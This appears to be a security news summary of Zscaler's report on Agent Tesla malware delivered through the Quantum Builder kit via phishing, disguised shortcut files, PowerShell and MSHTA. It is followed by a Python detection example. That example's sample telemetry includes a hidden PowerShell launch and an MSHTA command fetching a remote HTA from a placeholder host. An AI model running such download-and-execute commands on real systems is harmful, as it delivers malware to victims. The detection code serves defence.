"Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware"

The Agent Tesla Remote Access Trojan (RAT) is being delivered using a recently discovered malware builder called Quantum Builder. Compared with previous campaigns, this one adds several enhancements and shifts toward LNK (Windows shortcut) files, according to Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar. Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads that deliver next-stage malware, in this case Agent Tesla, onto the targeted machines.

The multi-stage attack chain begins with spear-phishing: the email carries a GZIP archive attachment containing a shortcut designed to execute PowerShell code, which in turn launches a remote HTML application (HTA) via MSHTA. The phishing emails appear to come from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a PDF document. The HTA file then decrypts and executes another PowerShell loader script, a downloader that retrieves and executes the Agent Tesla malware with administrative privileges. In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, and additional obfuscation strategies are used to conceal the malicious activity.

This article continues to discuss the cybercriminals delivering the Agent Tesla RAT using Quantum Builder.
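As an added detection example (not code from the THN or Zscaler write-up), the following Python flags the Explorer -> PowerShell -> MSHTA-with-remote-URL step of the chain described above over constructed process-creation records; the field names, paths and URL are assumptions for illustration.

```python
"""Added example, not from the write-up: a minimal detection over
constructed process-creation records (Sysmon Event ID 1 style) for the
chain Explorer -> PowerShell -> MSHTA fetching a remote HTA."""
import re
from typing import Dict, List

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_mshta_chains(events: List[Dict]) -> List[Dict]:
    """Return one finding per mshta.exe launched by PowerShell with a remote
    URL on its command line. The grandparent is included so an analyst can
    see whether the PowerShell itself came from an Explorer (shortcut) click."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if _basename(e["image"]) != "mshta.exe":
            continue
        url = REMOTE_URL.search(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        if not url or parent is None:
            continue
        if _basename(parent["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        gp = by_pid.get(parent["ppid"])
        gp_name = _basename(gp["image"]) if gp else None
        findings.append({
            "pid": e["pid"],
            "url": url.group(0),
            "parent_cmdline": parent["cmdline"],
            "grandparent": gp_name,
            "likely_shortcut_origin": gp_name == "explorer.exe",
        })
    return findings


# Constructed sample telemetry (assumed field names, placeholder host).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command <omitted>"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/stage.hta"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\Documents\local.hta"},  # local file, not flagged
]

if __name__ == "__main__":
    for finding in find_mshta_chains(SAMPLE_EVENTS):
        print(finding)
```

Only the MSHTA launched by PowerShell with a remote URL is reported; the locally sourced HTA started directly from Explorer is left alone, which keeps the rule narrow to the chain the report describes.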

THN reports "Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware"
